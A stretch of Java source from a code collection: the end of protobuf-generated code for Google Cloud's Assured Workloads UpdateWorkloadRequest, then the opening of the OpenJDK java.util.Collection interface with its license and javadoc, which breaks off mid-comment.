com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request for Updating a workload. * </pre> * * Protobuf type {@code google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.class, com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.Builder.class); } // Construct using com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getWorkloadFieldBuilder(); getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; workload_ = null; if (workloadBuilder_ != null) { workloadBuilder_.dispose(); workloadBuilder_ = null; } updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_descriptor; } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest getDefaultInstanceForType() { return com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest build() { com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest buildPartial() { com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest result = new com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.workload_ = workloadBuilder_ == null ? workload_ : workloadBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) { return mergeFrom((com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest other) { if (other == com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.getDefaultInstance()) return this; if (other.hasWorkload()) { mergeWorkload(other.getWorkload()); } if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage(getWorkloadFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.cloud.assuredworkloads.v1beta1.Workload workload_; private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.assuredworkloads.v1beta1.Workload, com.google.cloud.assuredworkloads.v1beta1.Workload.Builder, com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder> workloadBuilder_; /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the workload field is set. */ public boolean hasWorkload() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The workload. */ public com.google.cloud.assuredworkloads.v1beta1.Workload getWorkload() { if (workloadBuilder_ == null) { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } else { return workloadBuilder_.getMessage(); } } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setWorkload(com.google.cloud.assuredworkloads.v1beta1.Workload value) { if (workloadBuilder_ == null) { if (value == null) { throw new NullPointerException(); } workload_ = value; } else { workloadBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setWorkload( com.google.cloud.assuredworkloads.v1beta1.Workload.Builder builderForValue) { if (workloadBuilder_ == null) { workload_ = builderForValue.build(); } else { workloadBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeWorkload(com.google.cloud.assuredworkloads.v1beta1.Workload value) { if (workloadBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && workload_ != null && workload_ != com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance()) { getWorkloadBuilder().mergeFrom(value); } else { workload_ = value; } } else { workloadBuilder_.mergeFrom(value); } if (workload_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearWorkload() { bitField0_ = (bitField0_ & ~0x00000001); workload_ = null; if (workloadBuilder_ != null) { workloadBuilder_.dispose(); workloadBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.assuredworkloads.v1beta1.Workload.Builder getWorkloadBuilder() { bitField0_ |= 0x00000001; onChanged(); return getWorkloadFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder getWorkloadOrBuilder() { if (workloadBuilder_ != null) { return workloadBuilder_.getMessageOrBuilder(); } else { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.assuredworkloads.v1beta1.Workload, com.google.cloud.assuredworkloads.v1beta1.Workload.Builder, com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder> getWorkloadFieldBuilder() { if (workloadBuilder_ == null) { workloadBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.assuredworkloads.v1beta1.Workload, com.google.cloud.assuredworkloads.v1beta1.Workload.Builder, com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder>( getWorkload(), getParentForChildren(), isClean()); workload_ = null; } return workloadBuilder_; } private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000002); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000002; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) } // @@protoc_insertion_point(class_scope:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) private static final com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest(); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdateWorkloadRequest> PARSER = new com.google.protobuf.AbstractParser<UpdateWorkloadRequest>() { @java.lang.Override public UpdateWorkloadRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdateWorkloadRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdateWorkloadRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/j2objc
36,203
jre_emul/android/platform/libcore/ojluni/src/main/java/java/util/Collection.java
/* * Copyright (c) 1997, 2018, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package java.util; import java.util.function.IntFunction; import java.util.function.Predicate; import java.util.stream.Stream; import java.util.stream.StreamSupport; /** * The root interface in the <i>collection hierarchy</i>. A collection * represents a group of objects, known as its <i>elements</i>. Some * collections allow duplicate elements and others do not. Some are ordered * and others unordered. The JDK does not provide any <i>direct</i> * implementations of this interface: it provides implementations of more * specific subinterfaces like {@code Set} and {@code List}. This interface * is typically used to pass collections around and manipulate them where * maximum generality is desired. * * <p><i>Bags</i> or <i>multisets</i> (unordered collections that may contain * duplicate elements) should implement this interface directly. * * <p>All general-purpose {@code Collection} implementation classes (which * typically implement {@code Collection} indirectly through one of its * subinterfaces) should provide two "standard" constructors: a void (no * arguments) constructor, which creates an empty collection, and a * constructor with a single argument of type {@code Collection}, which * creates a new collection with the same elements as its argument. In * effect, the latter constructor allows the user to copy any collection, * producing an equivalent collection of the desired implementation type. * There is no way to enforce this convention (as interfaces cannot contain * constructors) but all of the general-purpose {@code Collection} * implementations in the Java platform libraries comply. * * <p>Certain methods are specified to be * <i>optional</i>. If a collection implementation doesn't implement a * particular operation, it should define the corresponding method to throw * {@code UnsupportedOperationException}. Such methods are marked "optional * operation" in method specifications of the collections interfaces. * * <p><a id="optional-restrictions"></a>Some collection implementations * have restrictions on the elements that they may contain. * For example, some implementations prohibit null elements, * and some have restrictions on the types of their elements. Attempting to * add an ineligible element throws an unchecked exception, typically * {@code NullPointerException} or {@code ClassCastException}. Attempting * to query the presence of an ineligible element may throw an exception, * or it may simply return false; some implementations will exhibit the former * behavior and some will exhibit the latter. More generally, attempting an * operation on an ineligible element whose completion would not result in * the insertion of an ineligible element into the collection may throw an * exception or it may succeed, at the option of the implementation. * Such exceptions are marked as "optional" in the specification for this * interface. * * <p>It is up to each collection to determine its own synchronization * policy. In the absence of a stronger guarantee by the * implementation, undefined behavior may result from the invocation * of any method on a collection that is being mutated by another * thread; this includes direct invocations, passing the collection to * a method that might perform invocations, and using an existing * iterator to examine the collection. * * <p>Many methods in Collections Framework interfaces are defined in * terms of the {@link Object#equals(Object) equals} method. For example, * the specification for the {@link #contains(Object) contains(Object o)} * method says: "returns {@code true} if and only if this collection * contains at least one element {@code e} such that * {@code (o==null ? e==null : o.equals(e))}." This specification should * <i>not</i> be construed to imply that invoking {@code Collection.contains} * with a non-null argument {@code o} will cause {@code o.equals(e)} to be * invoked for any element {@code e}. Implementations are free to implement * optimizations whereby the {@code equals} invocation is avoided, for * example, by first comparing the hash codes of the two elements. (The * {@link Object#hashCode()} specification guarantees that two objects with * unequal hash codes cannot be equal.) More generally, implementations of * the various Collections Framework interfaces are free to take advantage of * the specified behavior of underlying {@link Object} methods wherever the * implementor deems it appropriate. * * <p>Some collection operations which perform recursive traversal of the * collection may fail with an exception for self-referential instances where * the collection directly or indirectly contains itself. This includes the * {@code clone()}, {@code equals()}, {@code hashCode()} and {@code toString()} * methods. Implementations may optionally handle the self-referential scenario, * however most current implementations do not do so. * * <h2><a id="view">View Collections</a></h2> * * <p>Most collections manage storage for elements they contain. By contrast, <i>view * collections</i> themselves do not store elements, but instead they rely on a * backing collection to store the actual elements. Operations that are not handled * by the view collection itself are delegated to the backing collection. Examples of * view collections include the wrapper collections returned by methods such as * {@link Collections#checkedCollection Collections.checkedCollection}, * {@link Collections#synchronizedCollection Collections.synchronizedCollection}, and * {@link Collections#unmodifiableCollection Collections.unmodifiableCollection}. * Other examples of view collections include collections that provide a * different representation of the same elements, for example, as * provided by {@link List#subList List.subList}, * {@link NavigableSet#subSet NavigableSet.subSet}, or * {@link Map#entrySet Map.entrySet}. * Any changes made to the backing collection are visible in the view collection. * Correspondingly, any changes made to the view collection &mdash; if changes * are permitted &mdash; are written through to the backing collection. * Although they technically aren't collections, instances of * {@link Iterator} and {@link ListIterator} can also allow modifications * to be written through to the backing collection, and in some cases, * modifications to the backing collection will be visible to the Iterator * during iteration. * * <h2><a id="unmodifiable">Unmodifiable Collections</a></h2> * * <p>Certain methods of this interface are considered "destructive" and are called * "mutator" methods in that they modify the group of objects contained within * the collection on which they operate. They can be specified to throw * {@code UnsupportedOperationException} if this collection implementation * does not support the operation. Such methods should (but are not required * to) throw an {@code UnsupportedOperationException} if the invocation would * have no effect on the collection. For example, consider a collection that * does not support the {@link #add add} operation. What will happen if the * {@link #addAll addAll} method is invoked on this collection, with an empty * collection as the argument? The addition of zero elements has no effect, * so it is permissible for this collection simply to do nothing and not to throw * an exception. However, it is recommended that such cases throw an exception * unconditionally, as throwing only in certain cases can lead to * programming errors. * * <p>An <i>unmodifiable collection</i> is a collection, all of whose * mutator methods (as defined above) are specified to throw * {@code UnsupportedOperationException}. Such a collection thus cannot be * modified by calling any methods on it. For a collection to be properly * unmodifiable, any view collections derived from it must also be unmodifiable. * For example, if a List is unmodifiable, the List returned by * {@link List#subList List.subList} is also unmodifiable. * * <p>An unmodifiable collection is not necessarily immutable. If the * contained elements are mutable, the entire collection is clearly * mutable, even though it might be unmodifiable. For example, consider * two unmodifiable lists containing mutable elements. The result of calling * {@code list1.equals(list2)} might differ from one call to the next if * the elements had been mutated, even though both lists are unmodifiable. * However, if an unmodifiable collection contains all immutable elements, * it can be considered effectively immutable. * * <h2><a id="unmodview">Unmodifiable View Collections</a></h2> * * <p>An <i>unmodifiable view collection</i> is a collection that is unmodifiable * and that is also a view onto a backing collection. Its mutator methods throw * {@code UnsupportedOperationException}, as described above, while * reading and querying methods are delegated to the backing collection. * The effect is to provide read-only access to the backing collection. * This is useful for a component to provide users with read access to * an internal collection, while preventing them from modifying such * collections unexpectedly. Examples of unmodifiable view collections * are those returned by the * {@link Collections#unmodifiableCollection Collections.unmodifiableCollection}, * {@link Collections#unmodifiableList Collections.unmodifiableList}, and * related methods. * * <p>Note that changes to the backing collection might still be possible, * and if they occur, they are visible through the unmodifiable view. Thus, * an unmodifiable view collection is not necessarily immutable. However, * if the backing collection of an unmodifiable view is effectively immutable, * or if the only reference to the backing collection is through an * unmodifiable view, the view can be considered effectively immutable. * * <p>This interface is a member of the * <a href="{@docRoot}/../technotes/guides/collections/index.html"> * Java Collections Framework</a>. * * @implSpec * The default method implementations (inherited or otherwise) do not apply any * synchronization protocol. If a {@code Collection} implementation has a * specific synchronization protocol, then it must override default * implementations to apply that protocol. * * @param <E> the type of elements in this collection * * @author Josh Bloch * @author Neal Gafter * @see Set * @see List * @see Map * @see SortedSet * @see SortedMap * @see HashSet * @see TreeSet * @see ArrayList * @see LinkedList * @see Vector * @see Collections * @see Arrays * @see AbstractCollection * @since 1.2 */ public interface Collection<E> extends Iterable<E> { // Query Operations /** * Returns the number of elements in this collection. If this collection * contains more than {@code Integer.MAX_VALUE} elements, returns * {@code Integer.MAX_VALUE}. * * @return the number of elements in this collection */ int size(); /** * Returns {@code true} if this collection contains no elements. * * @return {@code true} if this collection contains no elements */ boolean isEmpty(); /** * Returns {@code true} if this collection contains the specified element. * More formally, returns {@code true} if and only if this collection * contains at least one element {@code e} such that * {@code Objects.equals(o, e)}. * * @param o element whose presence in this collection is to be tested * @return {@code true} if this collection contains the specified * element * @throws ClassCastException if the type of the specified element * is incompatible with this collection * (<a href="{@docRoot}/java.base/java/util/Collection.html#optional-restrictions">optional</a>) * @throws NullPointerException if the specified element is null and this * collection does not permit null elements * (<a href="{@docRoot}/java.base/java/util/Collection.html#optional-restrictions">optional</a>) */ boolean contains(Object o); /** * Returns an iterator over the elements in this collection. There are no * guarantees concerning the order in which the elements are returned * (unless this collection is an instance of some class that provides a * guarantee). * * @return an {@code Iterator} over the elements in this collection */ Iterator<E> iterator(); /** * Returns an array containing all of the elements in this collection. * If this collection makes any guarantees as to what order its elements * are returned by its iterator, this method must return the elements in * the same order. The returned array's {@linkplain Class#getComponentType * runtime component type} is {@code Object}. * * <p>The returned array will be "safe" in that no references to it are * maintained by this collection. (In other words, this method must * allocate a new array even if this collection is backed by an array). * The caller is thus free to modify the returned array. * * @apiNote * This method acts as a bridge between array-based and collection-based APIs. * It returns an array whose runtime type is {@code Object[]}. * Use {@link #toArray(Object[]) toArray(T[])} to reuse an existing * array, or use {@link #toArray(IntFunction)} to control the runtime type * of the array. * * @return an array, whose {@linkplain Class#getComponentType runtime component * type} is {@code Object}, containing all of the elements in this collection */ Object[] toArray(); /** * Returns an array containing all of the elements in this collection; * the runtime type of the returned array is that of the specified array. * If the collection fits in the specified array, it is returned therein. * Otherwise, a new array is allocated with the runtime type of the * specified array and the size of this collection. * * <p>If this collection fits in the specified array with room to spare * (i.e., the array has more elements than this collection), the element * in the array immediately following the end of the collection is set to * {@code null}. (This is useful in determining the length of this * collection <i>only</i> if the caller knows that this collection does * not contain any {@code null} elements.) * * <p>If this collection makes any guarantees as to what order its elements * are returned by its iterator, this method must return the elements in * the same order. * * @apiNote * This method acts as a bridge between array-based and collection-based APIs. * It allows an existing array to be reused under certain circumstances. * Use {@link #toArray()} to create an array whose runtime type is {@code Object[]}, * or use {@link #toArray(IntFunction)} to control the runtime type of * the array. * * <p>Suppose {@code x} is a collection known to contain only strings. * The following code can be used to dump the collection into a previously * allocated {@code String} array: * * <pre> * String[] y = new String[SIZE]; * ... * y = x.toArray(y);</pre> * * <p>The return value is reassigned to the variable {@code y}, because a * new array will be allocated and returned if the collection {@code x} has * too many elements to fit into the existing array {@code y}. * * <p>Note that {@code toArray(new Object[0])} is identical in function to * {@code toArray()}. * * @param <T> the component type of the array to contain the collection * @param a the array into which the elements of this collection are to be * stored, if it is big enough; otherwise, a new array of the same * runtime type is allocated for this purpose. * @return an array containing all of the elements in this collection * @throws ArrayStoreException if the runtime type of any element in this * collection is not assignable to the {@linkplain Class#getComponentType * runtime component type} of the specified array * @throws NullPointerException if the specified array is 